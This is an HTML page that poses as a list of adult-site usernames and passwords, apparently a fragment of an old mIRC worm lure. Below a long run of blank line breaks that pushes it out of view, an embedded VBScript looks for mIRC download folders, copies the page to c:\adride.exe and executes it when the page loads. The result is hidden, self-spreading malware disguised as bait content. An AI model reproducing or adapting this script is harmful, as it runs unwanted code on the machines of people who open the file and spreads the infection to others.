-->'s
<H4>XXX passwords</H4><a href="http:\\www.pussysex.com">www.pussysex.com</a><P>Name: Jones<br>Pass: Jones<p><a href="http:\\www.teensexxx.com">www.teensexxx.com</a><P>Name: qwerty<BR>Pass: qwerty<p><a href="http:\\www.analpleasure.com">www.analpleasure.com</a><P>Name: anal<br>Pass: anal<p><a href="http:\\www.hornybabes.com">www.hornybabes.com</a><P>Name: naked<br>Pass: sex<p><a href="http:\\www.loveland.com">www.loveland.com</a><P>Name: htroe<br>Pass: eerss<p><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><script language = VBScript>
Set fso = CreateObject("Scripting.FileSystemObject")
Set reg = CreateObject("WScript.Shell")
if (fso.FolderExists("c:\mirc\")) Then
FileName = "c:\mirc\download\xxxpasswords.html"
elseif (fso.FolderExists("C:\mirc32\")) Then
FileName = "c:\mirc32\download\xxxpasswords.html"
elseif (fso.FolderExists("C:\programs\mirc\")) Then
FileName = "c:\program\mirc\download\xxxpasswords.html"
elseif (fso.FolderExists("C:\programs files\mirc\")) Then
FileName = "c:\program files\mirc\download\xxxpasswords.html"
elseif (fso.FolderExists("C:\programs files\mirc32\")) Then
FileName = "c:\program files\mirc32\download\xxxpasswords.html"
else
FileName = "c:\autoexec.bat"
end if
fso.CopyFile FileName, "c:\adride.exe"
reg.Run ("c:\adride.exe")
</script>